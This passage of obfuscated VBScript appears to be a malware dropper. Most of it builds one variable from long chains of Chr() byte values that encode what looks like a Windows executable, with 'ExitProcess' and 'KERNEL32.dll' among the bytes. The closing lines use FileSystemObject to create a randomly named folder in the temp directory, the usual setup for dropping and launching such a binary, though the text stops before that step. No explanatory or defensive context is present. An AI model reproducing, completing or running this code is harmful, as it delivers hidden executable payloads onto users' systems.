wvWPLP=wvWPLP&Chr(248)&Chr(225)&Chr(226)&Chr(157)&Chr(141)&Chr(189)&Chr(100)&Chr(198)&Chr(133)&Chr(227)&Chr(84)&Chr(157)&Chr(36)&Chr(7)&Chr(127)&Chr(245)&Chr(187)&Chr(173)&Chr(4)&Chr(96)&Chr(115)&Chr(91)&Chr(214)&Chr(203)&Chr(173)&Chr(147)&Chr(96)&Chr(25)&Chr(22)&Chr(241)&Chr(41)&Chr(134)&Chr(159)&Chr(250)&Chr(226)&Chr(218)&Chr(196)&Chr(87)&Chr(127)&Chr(98)&Chr(29)&Chr(19)&Chr(126)&Chr(15)&Chr(119)&Chr(223)&Chr(233)&Chr(64)&Chr(56)&Chr(21)&Chr(70)&Chr(198)&Chr(226)&Chr(24)&Chr(178)&Chr(137)&Chr(196)&Chr(8)&Chr(94)&Chr(26)&Chr(157)&Chr(163)&Chr(81)&Chr(187)&Chr(199)&Chr(144)&Chr(249)&Chr(4)&Chr(247)&Chr(115)&Chr(137)&Chr(57)&Chr(147)&Chr(8)&Chr(45)&Chr(223)&Chr(39)&Chr(221)&Chr(59)&Chr(57)&Chr(238)&Chr(181)&Chr(145)&Chr(170)&Chr(190)&Chr(173)&Chr(228)&Chr(65)&Chr(204)&Chr(60)&Chr(149)&Chr(29)&Chr(249)&Chr(51)&Chr(14)&Chr(74)&Chr(234)&Chr(91)&Chr(23)&Chr(78) wvWPLP=wvWPLP&Chr(18)&Chr(239)&Chr(113)&Chr(143)&Chr(166)&Chr(5)&Chr(53)&Chr(20)&Chr(94)&Chr(109)&Chr(198)&Chr(249)&Chr(82)&Chr(110)&Chr(250)&Chr(44)&Chr(26)&Chr(19)&Chr(152)&Chr(6)&Chr(35)&Chr(255)&Chr(212)&Chr(24)&Chr(110)&Chr(151)&Chr(61)&Chr(88)&Chr(80)&Chr(204)&Chr(142)&Chr(27)&Chr(51)&Chr(101)&Chr(1)&Chr(239)&Chr(29)&Chr(83)&Chr(52)&Chr(39)&Chr(68)&Chr(164)&Chr(222)&Chr(69)&Chr(22)&Chr(25)&Chr(244)&Chr(75)&Chr(201)&Chr(239)&Chr(45)&Chr(168)&Chr(145)&Chr(112)&Chr(31)&Chr(191)&Chr(227)&Chr(11)&Chr(59)&Chr(190)&Chr(231)&Chr(87)&Chr(128)&Chr(87)&Chr(26)&Chr(109)&Chr(67)&Chr(60)&Chr(192)&Chr(184)&Chr(89)&Chr(77)&Chr(236)&Chr(188)&Chr(193)&Chr(15)&Chr(14)&Chr(233)&Chr(72)&Chr(74)&Chr(34)&Chr(249)&Chr(7)&Chr(12)&Chr(245)&Chr(12)&Chr(83)&Chr(138)&Chr(90)&Chr(120)&Chr(95)&Chr(132)&Chr(139)&Chr(149)&Chr(241)&Chr(122)&Chr(72)&Chr(195)&Chr(231)&Chr(214) 
wvWPLP=wvWPLP&Chr(23)&Chr(53)&Chr(104)&Chr(181)&Chr(203)&Chr(43)&Chr(45)&Chr(234)&Chr(211)&Chr(94)&Chr(103)&Chr(155)&Chr(117)&Chr(25)&Chr(104)&Chr(129)&Chr(140)&Chr(132)&Chr(249)&Chr(15)&Chr(35)&Chr(98)&Chr(151)&Chr(135)&Chr(164)&Chr(88)&Chr(15)&Chr(68)&Chr(21)&Chr(2)&Chr(95)&Chr(113)&Chr(82)&Chr(229)&Chr(135)&Chr(82)&Chr(173)&Chr(58)&Chr(247)&Chr(233)&Chr(185)&Chr(137)&Chr(98)&Chr(128)&Chr(162)&Chr(240)&Chr(161)&Chr(118)&Chr(121)&Chr(198)&Chr(11)&Chr(167)&Chr(236)&Chr(64)&Chr(0)&Chr(182)&Chr(118)&Chr(206)&Chr(195)&Chr(85)&Chr(93)&Chr(165)&Chr(210)&Chr(250)&Chr(232)&Chr(43)&Chr(99)&Chr(120)&Chr(64)&Chr(34)&Chr(131)&Chr(133)&Chr(179)&Chr(149)&Chr(202)&Chr(143)&Chr(96)&Chr(254)&Chr(217)&Chr(238)&Chr(173)&Chr(118)&Chr(246)&Chr(87)&Chr(65)&Chr(44)&Chr(80)&Chr(250)&Chr(235)&Chr(45)&Chr(207)&Chr(86)&Chr(216)&Chr(11)&Chr(16)&Chr(125)&Chr(155)&Chr(209)&Chr(11)&Chr(99) wvWPLP=wvWPLP&Chr(6)&Chr(232)&Chr(31)&Chr(239)&Chr(232)&Chr(15)&Chr(64)&Chr(12)&Chr(219)&Chr(167)&Chr(185)&Chr(172)&Chr(162)&Chr(86)&Chr(28)&Chr(98)&Chr(4)&Chr(245)&Chr(20)&Chr(152)&Chr(31)&Chr(126)&Chr(204)&Chr(227)&Chr(205)&Chr(154)&Chr(245)&Chr(240)&Chr(224)&Chr(161)&Chr(237)&Chr(131)&Chr(51)&Chr(180)&Chr(125)&Chr(60)&Chr(107)&Chr(70)&Chr(125)&Chr(49)&Chr(233)&Chr(156)&Chr(81)&Chr(8)&Chr(168)&Chr(175)&Chr(181)&Chr(73)&Chr(43)&Chr(81)&Chr(238)&Chr(17)&Chr(235)&Chr(49)&Chr(85)&Chr(144)&Chr(40)&Chr(228)&Chr(191)&Chr(76)&Chr(247)&Chr(226)&Chr(43)&Chr(197)&Chr(255)&Chr(239)&Chr(197)&Chr(74)&Chr(73)&Chr(185)&Chr(103)&Chr(46)&Chr(6)&Chr(208)&Chr(249)&Chr(101)&Chr(57)&Chr(179)&Chr(95)&Chr(80)&Chr(64)&Chr(106)&Chr(58)&Chr(103)&Chr(166)&Chr(76)&Chr(151)&Chr(64)&Chr(138)&Chr(186)&Chr(165)&Chr(207)&Chr(116)&Chr(223)&Chr(148)&Chr(112)&Chr(75)&Chr(9)&Chr(53)&Chr(216) 
wvWPLP=wvWPLP&Chr(164)&Chr(146)&Chr(37)&Chr(178)&Chr(157)&Chr(197)&Chr(99)&Chr(142)&Chr(129)&Chr(132)&Chr(76)&Chr(142)&Chr(53)&Chr(49)&Chr(218)&Chr(62)&Chr(248)&Chr(102)&Chr(117)&Chr(91)&Chr(17)&Chr(110)&Chr(172)&Chr(238)&Chr(48)&Chr(214)&Chr(233)&Chr(200)&Chr(84)&Chr(190)&Chr(225)&Chr(179)&Chr(125)&Chr(142)&Chr(113)&Chr(250)&Chr(109)&Chr(253)&Chr(90)&Chr(145)&Chr(29)&Chr(42)&Chr(52)&Chr(64)&Chr(26)&Chr(8)&Chr(91)&Chr(149)&Chr(112)&Chr(218)&Chr(137)&Chr(2)&Chr(30)&Chr(159)&Chr(65)&Chr(190)&Chr(24)&Chr(106)&Chr(208)&Chr(211)&Chr(139)&Chr(97)&Chr(145)&Chr(173)&Chr(174)&Chr(229)&Chr(140)&Chr(140)&Chr(118)&Chr(44)&Chr(64)&Chr(17)&Chr(176)&Chr(128)&Chr(54)&Chr(112)&Chr(253)&Chr(120)&Chr(49)&Chr(80)&Chr(135)&Chr(23)&Chr(67)&Chr(212)&Chr(3)&Chr(253)&Chr(108)&Chr(200)&Chr(147)&Chr(132)&Chr(50)&Chr(147)&Chr(22)&Chr(111)&Chr(192)&Chr(42)&Chr(149)&Chr(198)&Chr(161)&Chr(21) wvWPLP=wvWPLP&Chr(112)&Chr(92)&Chr(121)&Chr(102)&Chr(22)&Chr(122)&Chr(244)&Chr(161)&Chr(193)&Chr(245)&Chr(31)&Chr(229)&Chr(206)&Chr(45)&Chr(47)&Chr(128)&Chr(147)&Chr(197)&Chr(186)&Chr(127)&Chr(197)&Chr(183)&Chr(251)&Chr(218)&Chr(2)&Chr(138)&Chr(144)&Chr(85)&Chr(154)&Chr(13)&Chr(60)&Chr(120)&Chr(158)&Chr(224)&Chr(113)&Chr(175)&Chr(113)&Chr(143)&Chr(153)&Chr(27)&Chr(233)&Chr(85)&Chr(140)&Chr(202)&Chr(3)&Chr(237)&Chr(54)&Chr(241)&Chr(224)&Chr(140)&Chr(158)&Chr(80)&Chr(221)&Chr(105)&Chr(50)&Chr(171)&Chr(179)&Chr(93)&Chr(108)&Chr(134)&Chr(110)&Chr(185)&Chr(242)&Chr(102)&Chr(27)&Chr(16)&Chr(113)&Chr(182)&Chr(192)&Chr(220)&Chr(155)&Chr(77)&Chr(118)&Chr(44)&Chr(100)&Chr(82)&Chr(44)&Chr(128)&Chr(78)&Chr(53)&Chr(24)&Chr(216)&Chr(176)&Chr(136)&Chr(45)&Chr(19)&Chr(72)&Chr(127)&Chr(7)&Chr(55)&Chr(236)&Chr(113)&Chr(111)&Chr(63)&Chr(255)&Chr(142)&Chr(250)&Chr(172)&Chr(137)&Chr(14) 
wvWPLP=wvWPLP&Chr(71)&Chr(157)&Chr(93)&Chr(205)&Chr(73)&Chr(131)&Chr(24)&Chr(15)&Chr(184)&Chr(121)&Chr(1)&Chr(140)&Chr(128)&Chr(130)&Chr(209)&Chr(37)&Chr(193)&Chr(109)&Chr(5)&Chr(141)&Chr(41)&Chr(234)&Chr(3)&Chr(146)&Chr(204)&Chr(61)&Chr(0)&Chr(105)&Chr(214)&Chr(34)&Chr(96)&Chr(204)&Chr(175)&Chr(24)&Chr(228)&Chr(150)&Chr(159)&Chr(106)&Chr(133)&Chr(149)&Chr(30)&Chr(253)&Chr(229)&Chr(189)&Chr(217)&Chr(176)&Chr(121)&Chr(77)&Chr(19)&Chr(195)&Chr(138)&Chr(155)&Chr(36)&Chr(4)&Chr(20)&Chr(81)&Chr(152)&Chr(168)&Chr(17)&Chr(120)&Chr(237)&Chr(68)&Chr(109)&Chr(174)&Chr(252)&Chr(244)&Chr(105)&Chr(221)&Chr(214)&Chr(55)&Chr(124)&Chr(236)&Chr(225)&Chr(76)&Chr(33)&Chr(116)&Chr(247)&Chr(42)&Chr(81)&Chr(61)&Chr(250)&Chr(199)&Chr(24)&Chr(170)&Chr(72)&Chr(191)&Chr(241)&Chr(7)&Chr(195)&Chr(246)&Chr(77)&Chr(234)&Chr(137)&Chr(94)&Chr(114)&Chr(189)&Chr(31)&Chr(226)&Chr(27)&Chr(191) wvWPLP=wvWPLP&Chr(42)&Chr(245)&Chr(129)&Chr(134)&Chr(220)&Chr(21)&Chr(123)&Chr(182)&Chr(127)&Chr(219)&Chr(228)&Chr(119)&Chr(255)&Chr(117)&Chr(129)&Chr(239)&Chr(166)&Chr(134)&Chr(217)&Chr(209)&Chr(152)&Chr(76)&Chr(141)&Chr(215)&Chr(91)&Chr(19)&Chr(168)&Chr(26)&Chr(18)&Chr(232)&Chr(214)&Chr(33)&Chr(38)&Chr(125)&Chr(42)&Chr(212)&Chr(122)&Chr(73)&Chr(63)&Chr(114)&Chr(57)&Chr(78)&Chr(28)&Chr(109)&Chr(99)&Chr(225)&Chr(64)&Chr(76)&Chr(182)&Chr(124)&Chr(193)&Chr(63)&Chr(235)&Chr(58)&Chr(174)&Chr(249)&Chr(71)&Chr(63)&Chr(248)&Chr(27)&Chr(130)&Chr(208)&Chr(192)&Chr(34)&Chr(151)&Chr(175)&Chr(199)&Chr(188)&Chr(109)&Chr(182)&Chr(128)&Chr(243)&Chr(33)&Chr(227)&Chr(207)&Chr(2)&Chr(71)&Chr(121)&Chr(185)&Chr(156)&Chr(227)&Chr(230)&Chr(70)&Chr(61)&Chr(75)&Chr(78)&Chr(101)&Chr(225)&Chr(189)&Chr(92)&Chr(170)&Chr(39)&Chr(86)&Chr(205)&Chr(221)&Chr(112)&Chr(48)&Chr(160)&Chr(14)&Chr(246) 
wvWPLP=wvWPLP&Chr(164)&Chr(137)&Chr(252)&Chr(103)&Chr(127)&Chr(18)&Chr(224)&Chr(86)&Chr(19)&Chr(251)&Chr(60)&Chr(165)&Chr(38)&Chr(148)&Chr(60)&Chr(116)&Chr(145)&Chr(133)&Chr(66)&Chr(179)&Chr(198)&Chr(204)&Chr(83)&Chr(235)&Chr(129)&Chr(188)&Chr(8)&Chr(235)&Chr(121)&Chr(254)&Chr(109)&Chr(210)&Chr(12)&Chr(29)&Chr(83)&Chr(0)&Chr(110)&Chr(240)&Chr(248)&Chr(35)&Chr(171)&Chr(253)&Chr(136)&Chr(35)&Chr(30)&Chr(117)&Chr(2)&Chr(197)&Chr(90)&Chr(44)&Chr(6)&Chr(159)&Chr(55)&Chr(38)&Chr(84)&Chr(152)&Chr(180)&Chr(231)&Chr(212)&Chr(174)&Chr(237)&Chr(141)&Chr(205)&Chr(34)&Chr(48)&Chr(129)&Chr(142)&Chr(78)&Chr(141)&Chr(238)&Chr(228)&Chr(174)&Chr(236)&Chr(152)&Chr(149)&Chr(157)&Chr(232)&Chr(192)&Chr(5)&Chr(66)&Chr(219)&Chr(50)&Chr(127)&Chr(34)&Chr(129)&Chr(159)&Chr(240)&Chr(224)&Chr(73)&Chr(232)&Chr(93)&Chr(184)&Chr(126)&Chr(142)&Chr(32)&Chr(72)&Chr(232)&Chr(145)&Chr(30)&Chr(168) wvWPLP=wvWPLP&Chr(190)&Chr(97)&Chr(246)&Chr(225)&Chr(190)&Chr(213)&Chr(196)&Chr(255)&Chr(19)&Chr(111)&Chr(174)&Chr(76)&Chr(239)&Chr(119)&Chr(60)&Chr(16)&Chr(153)&Chr(247)&Chr(46)&Chr(239)&Chr(107)&Chr(95)&Chr(98)&Chr(157)&Chr(27)&Chr(45)&Chr(44)&Chr(63)&Chr(121)&Chr(138)&Chr(166)&Chr(241)&Chr(188)&Chr(173)&Chr(37)&Chr(221)&Chr(26)&Chr(31)&Chr(84)&Chr(238)&Chr(157)&Chr(199)&Chr(120)&Chr(91)&Chr(225)&Chr(5)&Chr(31)&Chr(10)&Chr(219)&Chr(204)&Chr(108)&Chr(155)&Chr(127)&Chr(39)&Chr(88)&Chr(134)&Chr(129)&Chr(19)&Chr(194)&Chr(11)&Chr(240)&Chr(249)&Chr(170)&Chr(241)&Chr(5)&Chr(14)&Chr(129)&Chr(194)&Chr(252)&Chr(200)&Chr(217)&Chr(159)&Chr(63)&Chr(87)&Chr(184)&Chr(192)&Chr(228)&Chr(228)&Chr(92)&Chr(81)&Chr(6)&Chr(134)&Chr(75)&Chr(100)&Chr(5)&Chr(82)&Chr(190)&Chr(9)&Chr(56)&Chr(57)&Chr(39)&Chr(216)&Chr(46)&Chr(196)&Chr(16)&Chr(98)&Chr(254)&Chr(202)&Chr(198)&Chr(152) 
wvWPLP=wvWPLP&Chr(9)&Chr(50)&Chr(127)&Chr(59)&Chr(110)&Chr(116)&Chr(183)&Chr(217)&Chr(156)&Chr(18)&Chr(89)&Chr(31)&Chr(125)&Chr(213)&Chr(50)&Chr(7)&Chr(101)&Chr(198)&Chr(100)&Chr(74)&Chr(76)&Chr(70)&Chr(58)&Chr(103)&Chr(176)&Chr(46)&Chr(200)&Chr(249)&Chr(201)&Chr(97)&Chr(164)&Chr(16)&Chr(103)&Chr(74)&Chr(228)&Chr(3)&Chr(9)&Chr(79)&Chr(242)&Chr(107)&Chr(170)&Chr(26)&Chr(33)&Chr(146)&Chr(233)&Chr(7)&Chr(60)&Chr(46)&Chr(65)&Chr(90)&Chr(221)&Chr(46)&Chr(219)&Chr(44)&Chr(179)&Chr(172)&Chr(3)&Chr(249)&Chr(141)&Chr(189)&Chr(39)&Chr(111)&Chr(247)&Chr(61)&Chr(0)&Chr(117)&Chr(231)&Chr(102)&Chr(220)&Chr(153)&Chr(159)&Chr(202)&Chr(12)&Chr(128)&Chr(217)&Chr(19)&Chr(192)&Chr(92)&Chr(69)&Chr(208)&Chr(147)&Chr(207)&Chr(9)&Chr(179)&Chr(79)&Chr(241)&Chr(130)&Chr(183)&Chr(33)&Chr(13)&Chr(18)&Chr(100)&Chr(7)&Chr(172)&Chr(167)&Chr(181)&Chr(71)&Chr(206)&Chr(4)&Chr(107) wvWPLP=wvWPLP&Chr(68)&Chr(128)&Chr(22)&Chr(254)&Chr(150)&Chr(203)&Chr(239)&Chr(109)&Chr(183)&Chr(45)&Chr(227)&Chr(28)&Chr(107)&Chr(108)&Chr(162)&Chr(91)&Chr(89)&Chr(226)&Chr(74)&Chr(50)&Chr(23)&Chr(245)&Chr(117)&Chr(198)&Chr(197)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0) 
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0) wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0) 
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(44)&Chr(48)&Chr(0)&Chr(0) wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(84)&Chr(48)&Chr(0)&Chr(0)&Chr(56)&Chr(48)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(48)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(48)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(156)&Chr(0)&Chr(69)&Chr(120)&Chr(105)&Chr(116)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(48)&Chr(0)&Chr(0)&Chr(75)&Chr(69)&Chr(82)&Chr(78)&Chr(69)&Chr(76)&Chr(51)&Chr(50)&Chr(46)&Chr(100)&Chr(108)&Chr(108)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0) 
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0) wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0) 
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0) wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0) 
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(185)&Chr(103)&Chr(193)&Chr(128)&Chr(176)&Chr(186)&Chr(49)&Chr(120)&Chr(24)&Chr(106)&Chr(53)&Chr(29)&Chr(169)&Chr(185)&Chr(208)&Chr(31)&Chr(12)&Chr(231)&Chr(176)&Chr(241)&Chr(95)&Chr(233)&Chr(122)&Chr(216)&Chr(214)&Chr(95)&Chr(138)&Chr(162)&Chr(8)&Chr(132)&Chr(52)&Chr(206)&Chr(221)&Chr(247)&Chr(244)&Chr(26)&Chr(119)&Chr(198)&Chr(248)&Chr(96)&Chr(87)&Chr(252)&Chr(214)&Chr(57)&Chr(25)&Chr(230)&Chr(218)&Chr(128)&Chr(175)&Chr(68)&Chr(75)&Chr(198)&Chr(17)&Chr(115)&Chr(145)&Chr(37)&Chr(148)&Chr(52)&Chr(106)&Chr(150)&Chr(9)&Chr(6)&Chr(168) Dim eyulDLCNyPhly Set eyulDLCNyPhly = CreateObject("Scripting.FileSystemObject") Dim ztgykKkZMO Dim IxLPuRIJZ Dim sBpfsVCwFv Dim KIymDWTNS Set IxLPuRIJZ = eyulDLCNyPhly.GetSpecialFolder(2) KIymDWTNS = IxLPuRIJZ & "\" & eyulDLCNyPhly.GetTempName() eyulDLCNyPhly.CreateFolder(KIymDWTNS) 